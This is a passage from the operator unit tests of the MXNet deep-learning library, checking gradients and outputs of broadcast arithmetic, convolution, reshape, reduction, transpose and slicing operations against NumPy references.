check_binary_op_forward(c, lambda a, b: a - b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_binary_data)
def test_bmul(a, b):
c = a * b
check_binary_op_forward(c, lambda a, b: a * b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_binary_data)
def test_bdiv(a, b):
c = a / b
check_binary_op_forward(c, lambda a, b: a / b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_binary_data)
def test_bmod(a, b):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
#c = a % b
c = mx.sym.cast(a, dtype='float64') % mx.sym.cast(b, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
check_binary_op_forward(c, lambda a, b: np.float32(a) % np.float32(b), gen_binary_data, rtol=0, atol=0)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.cast(a, dtype='int32') % mx.sym.cast(b, dtype='int32')
check_binary_op_forward(c, lambda a, b: a % b, gen_binary_data_int)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data_int)
def test_bpow(a, b):
c = a ** b
check_binary_op_forward(c, lambda a, b: a ** b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_binary_data)
def test_bneq(a, b):
c = a != b
# '!=' is sensitive to the precision of the comparison. Force numpy to match mxnet's float32.
# Issue exposed with seed 1644387363
check_binary_op_forward(c, lambda a, b: (np.float32(a) != np.float32(b)).astype(a.dtype), gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bneq(a, b)
@with_seed()
def test_broadcast_binary_op():
def check_bmaxmin_gradient(test_sym, x, y, delta, rtol, atol):
"""This function ensures that checking the numerical gradient of
broadcast_max/min is not crossing the boundary y=x where there
is no gradient definition at those sigularities."""
x_max = np.max(x)
y = x_max + 2 * delta + np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
x_min = np.min(x)
y = x_min - 2 * delta - np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = mx.sym.broadcast_plus(a, b)
check_binary_op_forward(c, lambda a, b: a + b, gen_broadcast_data, mx_nd_func=mx.nd.add)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_broadcast_data)
def test_bminus(a, b):
c = mx.sym.broadcast_minus(a, b)
check_binary_op_forward(c, lambda a, b: a - b, gen_broadcast_data, mx_nd_func=mx.nd.subtract)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_broadcast_data)
def test_bmul(a, b):
c = mx.sym.broadcast_mul(a, b)
check_binary_op_forward(c, lambda a, b: a * b, gen_broadcast_data, mx_nd_func=mx.nd.multiply)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_broadcast_data)
def test_bdiv(a, b):
c = mx.sym.broadcast_div(a, b)
check_binary_op_forward(c, lambda a, b: a / b, gen_broadcast_data, mx_nd_func=mx.nd.divide)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_broadcast_data)
def test_bmod(a_, b_):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
a = mx.sym.cast(a_, dtype='float64')
b = mx.sym.cast(b_, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
c = mx.sym.broadcast_mod(a, b)
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data, atol=1, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.broadcast_mod(mx.sym.cast(a, dtype='int32'), mx.sym.cast(b, dtype='int32'))
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data_int, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bpow(a, b):
c = mx.sym.broadcast_power(a, b)
check_binary_op_forward(c, lambda a, b: a ** b, gen_broadcast_data, mx_nd_func=mx.nd.power)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_broadcast_data)
def test_bequal(a, b):
c = mx.sym.broadcast_equal(a, b)
check_binary_op_forward(c, lambda a, b: (a == b).astype(a.dtype), gen_broadcast_data_int,
mx_nd_func=mx.nd.equal)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bmax(a, b):
c = mx.sym.broadcast_maximum(a, b)
check_binary_op_forward(c, lambda x, y: np.maximum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.maximum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bmin(a, b):
c = mx.sym.broadcast_minimum(a, b)
check_binary_op_forward(c, lambda x, y: np.minimum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.minimum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_band(a, b):
c = mx.sym.broadcast_logical_and(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_and(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_and)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bor(a, b):
c = mx.sym.broadcast_logical_or(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_or(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_or)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bxor(a, b):
c = mx.sym.broadcast_logical_xor(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_xor(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_xor)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bequal(a, b)
test_bmax(a, b)
test_bmin(a, b)
test_band(a, b)
test_bor(a, b)
test_bxor(a, b)
@with_seed()
def test_run_convolution_dilated_impulse_response(dil=(1,1), kernel_shape=(3,3), verbose=False):
dim = len(dil)
assert(len(kernel_shape) == dim)
# Input for spike response
data_size = 33
data_shape = (1, 1) + (data_size,) * dim
center = (0,0) + (data_size // 2,) * dim
spike_imgs = np.zeros(shape=data_shape, dtype=np.float32)
spike_imgs[center] = 1.0
spike_img = mx.nd.array(spike_imgs)
spike_img2 = mx.nd.array(spike_imgs)
kernel_weights = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel_weights2 = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel = mx.symbol.Variable('kernel')
in_img = mx.symbol.Variable('input')
net = mx.symbol.Convolution(in_img, num_filter=1,kernel=kernel_shape, dilate=dil, no_bias="true", name='test_convolution')
net.list_arguments()
be = net.bind(default_context(), args={ 'input' : spike_img, 'test_convolution_weight' : kernel_weights},
args_grad={'input' : spike_img2, 'test_convolution_weight' : kernel_weights2 } )
be.forward(True)
out_o = be.outputs[0].asnumpy()
ndo = be.outputs[0]
out_grads = np.zeros(shape=be.outputs[0].shape, dtype=np.float32)
out_grads[center] = 1.0
out_grad = mx.nd.array(out_grads)
be.backward([out_grad])
vgrad = be.grad_arrays[0].asnumpy()
out = out_o.reshape(out_o.shape[2:])
nz_loc = np.nonzero(out)
assert_allclose(np.sum(out),np.prod(kernel_shape),atol=1e-5)
assert_allclose(np.sum(vgrad),np.prod(kernel_shape),atol=1e-5)
# Now check whether the input gradient was computed correctly
input_grad = mx.nd.array(vgrad)
be = net.bind(default_context(), args={ 'input' : input_grad, 'test_convolution_weight' : kernel_weights})
be.forward(True)
out_o = be.outputs[0].asnumpy()
assert_allclose(out_o[center],np.prod(kernel_shape),atol=1e-5)
rnd_kernel_s = np.random.uniform(low=0.0, high=1.0, size=tuple([1,1]+list(kernel_shape))).astype(np.float32)
impulse_error = mx.nd.array(out_o/np.sum(out_o)) # This should be 1.0 at [0,0,16,16]
rnd_kernel = mx.nd.array(rnd_kernel_s)
rnd_kernel2 = mx.nd.array(rnd_kernel_s)
white_in = mx.nd.ones(shape=data_shape)
white_in2 = mx.nd.ones(shape=data_shape)
be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : rnd_kernel},
args_grad={'input' : white_in2, 'test_convolution_weight' : rnd_kernel2 } )
be.forward(True)
be.backward([impulse_error])
out_orig = be.outputs[0].asnumpy()
kernel_gradient = be.grad_arrays[1].asnumpy()
dkernel = mx.nd.array(rnd_kernel_s + kernel_gradient)
be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : dkernel})
be.forward(True)
out = be.outputs[0].asnumpy()
# Now do a simple check of the kernel gradient
assert(out[center] - np.sum(kernel_gradient) - out_orig[center] < 0.001)
@with_seed()
def test_convolution_dilated_impulse_response():
# 1D
for dil in [ (1,), (2,), (3,) ]:
for ks in [ (1,), (2,), (3,), (4,)]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 2D
for dil in [ (1,1), (2,2), (3,3) ]:
for ks in [ (3,3), (4,4), (2,3), (3,2), (1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 3D
for dil in [ (1,1,1), (2,2,2), (3,3,3) ]:
for ks in [ (3,3,3), (4,4,4), (2,3,4), (3,2,4), (1,1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
@with_seed()
@pytest.mark.serial
@pytest.mark.parametrize('src_shape,shape_args,reverse,dst_shape', [
((2, 3, 5, 5), (0, -1), False, (2, 75)),
((2, 3, 5, 5), (0, 0, -1), False, (2, 3, 25)),
((5, 3, 4, 5), (0, -1, 0), False, (5, 15, 4)),
((2, 3, 5, 4), (-1, 0, 0), False, (8, 3, 5)),
((2, 3, 5, 5), (0, 0, 0, 0), False, (2, 3, 5, 5)),
((2, 4, 5, 3), (-1, 2, 2, 1), False, (30, 2, 2, 1)),
((2, 3, 5, 6), (-2,), False, (2, 3, 5, 6)),
((2, 3, 5, 6), (6, 1, -2), False, (6, 1, 5, 6)),
((2, 3, 5, 6), (-3, -3), False, (6, 30)),
((2, 3, 5, 6), (-3, -1), False, (6, 30)),
((64,), (-4, 16, 4), False, (16, 4)),
((64,), (-4, 16, -1), False, (16, 4)),
((64, 1, 2, 3), (-4, 16, -1, -2), False, (16, 4, 1, 2, 3)),
((2, 3, 5, 5), (0, -1), True, (5, 30)),
((2, 3, 5, 5), (0, 0, -1), True, (3, 5, 10)),
((5, 3, 4, 5), (0, -1, 0), True, (3, 20, 5)),
((2, 3, 5, 4), (-1, 0, 0), True, (6, 5, 4)),
((2, 3, 4, 5), (3, -1, 0), True, (3, 8, 5)),
((2, 3, 5, 5), (5, 3, 0, -1), True, (5, 3, 5, 2)),
((2, 3, 5, 5), (0, 0, 0, 0), True, (2, 3, 5, 5)),
((2, 3, 5, 6), (-2,), True, (2, 3, 5, 6)),
((2, 3, 5, 6), (-2, 1, 30), True, (2, 3, 1, 30)),
((2, 3, 5, 6), (-3, -3), True, (6, 30)),
((64,), (16, 4, -4), True, (16, 4)),
((64,), (16, -1, -4), True, (16, 4)),
((1, 2, 3, 64), (-2, -1, 16, -4), True, (1, 2, 3, 4, 16))
])
def test_reshape_new(src_shape, shape_args, reverse, dst_shape):
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, shape=shape_args, reverse=reverse)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=src_shape)
assert output_shape[0] == dst_shape, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
dat_npy = np.random.rand(*src_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net.simple_bind(default_context(), data=src_shape)
exe.arg_dict['data'][:] = dat_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - dat_npy.reshape(dst_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['data'].asnumpy() - grad_npy.reshape(src_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
for i in range(len(src_shape)):
holdout_src_shape = list(src_shape)
holdout_src_shape[i] = 0
holdout_src_shape = tuple(holdout_src_shape)
net = mx.sym.Variable('data')
net = mx.sym.elemwise_add(net.reshape(shape_args, reverse=reverse), mx.sym.ones(shape=dst_shape))
input_shape, output_shape, __ = net.infer_shape(data=holdout_src_shape)
assert output_shape[0] == dst_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
assert input_shape[0] == src_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
@with_seed()
def test_reshape_old():
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, target_shape=(2, 0))
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=(2, 3, 5, 5))
assert(output_shape[0] == (2, 75))
# Test for Flatten
data = mx.sym.Variable("data")
net = mx.sym.Flatten(data)
exe = net.simple_bind(ctx=default_context(), data=(5, 4, 3, 7))
data_npy = np.random.normal(size=(5, 4, 3, 7))
out_grad_npy = np.random.normal(size=(5, 4 * 3 * 7))
outputs = exe.forward(is_train=True, data=data_npy)[0].asnumpy()
assert_allclose(outputs, data_npy.reshape((5, 4 * 3 * 7)))
exe.backward(out_grads=[mx.nd.array(out_grad_npy, ctx=default_context())])
assert_allclose(exe.grad_arrays[0].asnumpy(), out_grad_npy.reshape((5, 4, 3, 7)))
@with_seed()
def test_reshape_like():
def test_reshape_like_new(lhs_shape, rhs_shape, lbeg, lend, rbeg, rend, dst_shape):
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs, lhs_begin=lbeg, lhs_end=lend, rhs_begin=rbeg, rhs_end=rend)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=lhs_shape, rhs=rhs_shape)
assert output_shape[0] == dst_shape, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
lhs_npy = np.random.rand(*lhs_shape)
rhs_npy = np.random.rand(*rhs_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net.simple_bind(default_context(), lhs=lhs_shape, rhs=rhs_shape)
exe.arg_dict['lhs'][:] = lhs_npy
exe.arg_dict['rhs'][:] = rhs_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - lhs_npy.reshape(dst_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['lhs'].asnumpy() - grad_npy.reshape(lhs_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
# Test new api (Using shape)
test_cases = [
[(30,), (15,2,4), 0, None, 0, 2, (15,2)],
[(30,), (15,2,4), None, 1, None, 2, (15,2)],
[(30,7), (15,2,4), 0, 1, 0, 2, (15,2,7)],
[(3,5), (1,15,4), 0, 2, 1, 2, (15,)],
[(3,5), (1,15,4), 0, None, 1, -1, (15,)],
[(30,12), (4,2,2,3), -1, None, 1, None, (30,2,2,3)],
[(1,1,7,3,1,1), (81,1,1,21), 1, -1, 1, None, (1,1,1,21,1)]
]
# for test_case in test_cases:
for test_case in test_cases:
test_reshape_like_new(*test_case)
# Test old api
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=(40, 30), rhs=(30,20,2))
assert(output_shape[0] == (30,20,2))
@with_seed()
def test_reduce():
sample_num = 500
def test_reduce_inner(numpy_reduce_func, numpy_reduce_grad_func, mx_reduce_sym, nan_prob=0,
test_exclude=True, test_none_axis=False):
for i in range(sample_num):
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
# Insert a NaN with probability equal to nan_prob
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
axis_num = np.random.randint(0, ndim, size=1)
axis_flags = np.random.randint(0, 2, size=ndim)
if test_exclude:
exclude = np.random.randint(0, 2)
else:
exclude = False
axes = []
for (axis, flag) in enumerate(axis_flags):
if flag:
axes.append(axis)
if 0 == len(axes):
axes = None
elif 1 == len(axes):
axes = axes[0]
else:
axes = tuple(axes)
keepdims = np.random.randint(0, 2)
a = mx.symbol.Variable('a')
if axes is None:
if test_none_axis:
b = mx_reduce_sym(a, keepdims=keepdims, axis=axes)
else:
b = mx_reduce_sym(a, keepdims=keepdims)
elif exclude and isinstance(axes, tuple) and len(axes) < ndim:
naxes = [i for i in range(ndim) if i not in axes]
b = mx_reduce_sym(a, axis=naxes, keepdims=keepdims, exclude=True)
else:
b = mx_reduce_sym(a, axis=axes, keepdims=keepdims)
dat_npy = np.random.rand(*shape)
# Test with both negative and positive values (randomly). Avoid having both in the same
# test, which can be problematic for error checking due to near-zero values.
if np.random.rand() > 0.5:
dat_npy = -dat_npy
if nan_prob > 0:
dat_npy[np.random.rand(*shape) < nan_prob] = np.nan
sum_groundtruth = np.array(numpy_reduce_func(dat_npy, axis=axes, keepdims=keepdims))
if sum_groundtruth.shape == ():
sum_groundtruth = np.array([sum_groundtruth])
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.array(np.random.rand(*sum_groundtruth.shape))
keepdim_shape = np_reduce(dat_npy, axes, 1, np.sum).shape
grad_groundtruth = numpy_reduce_grad_func(outgrad=outgrad_npy, data=dat_npy,
outdata=sum_groundtruth,
axis=axes, keepdims=keepdims,
keepdim_shape=keepdim_shape)
net = b.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
equal_forward = almost_equal_ignore_nan(net.outputs[0].asnumpy(), sum_groundtruth, 1E-4, 1E-4)
assert equal_forward
net.backward(out_grads=mx.nd.array(outgrad_npy))
bc_grad_groundtruth = np.broadcast_to(grad_groundtruth, grad_nd.shape)
equal_backward = almost_equal_ignore_nan(grad_nd.asnumpy(), bc_grad_groundtruth, 1E-4, 1E-4)
assert equal_backward
test_none_axis = [True, False]
for test_none in test_none_axis:
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.sum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape),
mx.symbol.sum, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.mean),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape)/(data.size/outdata.size),
mx.symbol.mean, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.prod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (outdata.reshape(keepdim_shape) / data),
mx.symbol.prod, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nansum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape)),
mx.symbol.nansum, 0.3, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nanprod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape) *
(outdata.reshape(keepdim_shape) / data)),
mx.symbol.nanprod, 0.3, test_none_axis=test_none)
# grad of max and min are sensitive to the precision of the calculation.
# Force numpy to match mxnet's float32.
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.max),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.max)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.min),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.min)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.linalg.norm),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (data / outdata.reshape(keepdim_shape)),
mx.symbol.norm, test_exclude=False, test_none_axis=test_none)
@with_seed()
def test_broadcast():
sample_num = 200
for i in range(sample_num):
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
ndim = np.random.randint(1, 6)
target_shape = np.random.randint(1, 6, size=(ndim,))
axis = tuple(set(np.random.randint(0, ndim, np.random.randint(1, ndim + 1))))
shape = target_shape.copy()
size = tuple([shape[ele] for ele in axis])
for ele in axis:
shape[ele] = 1
target_shape_with_zero = list(target_shape)
for idx in range(len(target_shape_with_zero)):
if idx not in axis:
target_shape_with_zero[idx] = 0
break
a = mx.symbol.Variable('a')
sym_bcast_axis = mx.symbol.broadcast_axis(a, axis=axis, size=size)
sym_bcast_to = mx.symbol.broadcast_to(a, shape=tuple(target_shape))
sym_bcast_to_with_zero = mx.symbol.broadcast_to(a, shape=tuple(target_shape_with_zero))
sym_bcast_like = mx.symbol.broadcast_like(a, sym_bcast_to)
def test_broadcasting_ele(sym_bcast):
dat_npy = np.random.rand(*shape)
groundtruth = dat_npy
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.random.rand(*target_shape)
grad_groundtruth = np_reduce(outgrad_npy, axis=axis, keepdims=True,
numpy_reduce_func=np.sum)
net = sym_bcast.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
assert (net.outputs[0].shape == target_shape).all()
assert_almost_equal(net.outputs[0], groundtruth, rtol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
assert_almost_equal(grad_nd, grad_groundtruth, rtol=1e-4)
test_broadcasting_ele(sym_bcast_axis)
test_broadcasting_ele(sym_bcast_to)
test_broadcasting_ele(sym_bcast_to_with_zero)
test_broadcasting_ele(sym_bcast_like)
@with_seed()
def test_transpose():
for ndim in range(1, 7):
for t in range(5):
dims = list(np.random.randint(1, 10, size=ndim))
axes = list(range(ndim))
random.shuffle(axes)
axes = tuple(axes)
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@with_seed()
@pytest.mark.serial
def test_pseudo2dtranspose():
def getTwoInts(mn, mx):
n1 = np.random.randint(mn, mx)
n2 = np.random.randint(mn, mx-1)
n2 = n2 if n2 < n1 else n2+1
return tuple(np.sort([n1, n2]))
def getTranspAxes(ndim):
axes = list(range(ndim))
n1, n2 = getTwoInts(0,ndim)
return tuple(axes[:n1]+axes[n2:]+axes[n1:n2])
for ndim in range(2, 7):
for dt in ['int8', 'half', 'int32', 'int64']:
for _ in range(5):
dims = list(np.random.randint(5, 20, size=ndim))
axes = getTranspAxes(ndim)
x = mx.nd.array(np.random.normal(size=dims), dtype=dt)
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
@with_seed()
@pytest.mark.serial
def test_big_transpose():
n = [1]
d = list(np.random.randint(132, 160, size=1))
hw = list(np.random.randint(256, 320, size=2))
c = [10]
dims = n + d + hw + c
axes = (0,4,1,2,3)
x_np = np.random.normal(size=dims).astype('uint8')
x = mx.nd.array(x_np, dtype='uint8')
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x_np, axes=axes), y.asnumpy().astype('uint8'))
axes = (0,2,3,4,1)
z = mx.nd.transpose(y, axes=axes)
assert_allclose(x_np, z.asnumpy().astype('uint8'))
@with_seed()
@pytest.mark.serial
def test_larger_transpose():
x = mx.nd.random.normal(shape=(50,51))
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@with_seed()
def test_expand_dims():
for ndim in range(1, 6):
for axis in range(-ndim + 1, ndim):
x = np.random.normal(size=list(np.random.randint(1, 10, size=ndim)))
y = mx.nd.array(x)
x1 = np.expand_dims(x, axis=axis)
y1 = mx.nd.expand_dims(y, axis=axis)
assert_allclose(x1, y1.asnumpy())
assert_allclose(x1.shape, y1.shape)
@with_seed()
def test_crop():
for ndim in range(1, 6):
for t in range(5):
dims = []
begin = []
end = []
idx = []
for i in range(ndim):
d = random.randint(1, 5)
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if b == 0 and random.randint(0, 1):
b = None
elif b != 0 and random.randint(0, 1):
b -= d
if e == d and random.randint(0, 1):
e = None
elif e != d and random.randint(0, 1):
e -= d
dims.append(d)
begin.append(b)
end.append(e)
idx.append(slice(b, e))
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.crop(x, begin=tuple(begin), end=tuple(end))
assert_allclose(x.asnumpy()[idx], y.asnumpy())
vx = mx.sym.Variable('x')
vy = mx.sym.crop(vx, begin=tuple(begin), end=tuple(end))
check_numeric_gradient(vy, [x.asnumpy()])
@with_seed()
def test_slice_axis():
for ndim in range(1, 6):
shape = np.random.randint(1, 11, size=(ndim,))
for t in range(ndim):
d = shape[t]
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if np.random.rand() > 0.6:
e = None
else:
if e < d and np.random.rand() > 0.5:
e = e - d
if np.random.rand() > 0.5:
b = b - d
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
idx[t] = slice(b, e)
X = mx.symbol.Variable('X')
x = mx.nd.array(np.random.normal(size=shape))
Y = mx.symbol.slice_axis(data=X, axis=t, begin=b, end=e)
xgrad = mx.nd.empty(x.shape)
exec1 = Y.bind(default_context(), args = [x], args_grad = {'X': xgrad})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
x_grad_npy = np.random.normal(size=x.shape)
xgrad = mx.nd.array(x_grad_npy)
exec2 = Y.bind(default_context(), args=[x], args_grad={'X': xgrad}, grad_req="add")
exec2.forward(is_train=True)
exec2.backward([exec2.outputs[0]])
xx = np.zeros(shape=x.shape, dtype=np.float32)
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx + x_grad_npy, xgrad.asnumpy(), atol=1E-5)
@with_seed()
def test_slice_like():
for ndim in range(1, 6):
from_shape = np.random.randint(1, 11, size=(ndim,))
shape = [s + np.random.randint(0, 3) for s in from_shape]
for t in range(ndim):
if t > 0:
axes = np.random.randint(0, ndim, size=t).tolist()
else:
axes = []
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
if i in axes or not axes:
idx[i] = slice(0, from_shape[i])
if axes:
pos = np.random.randint(0, t)
if axes[pos] > 0:
axes[pos] -= ndim # negative index
X = mx.symbol.Variable('X')
X_1 = mx.symbol.Variable('X1')
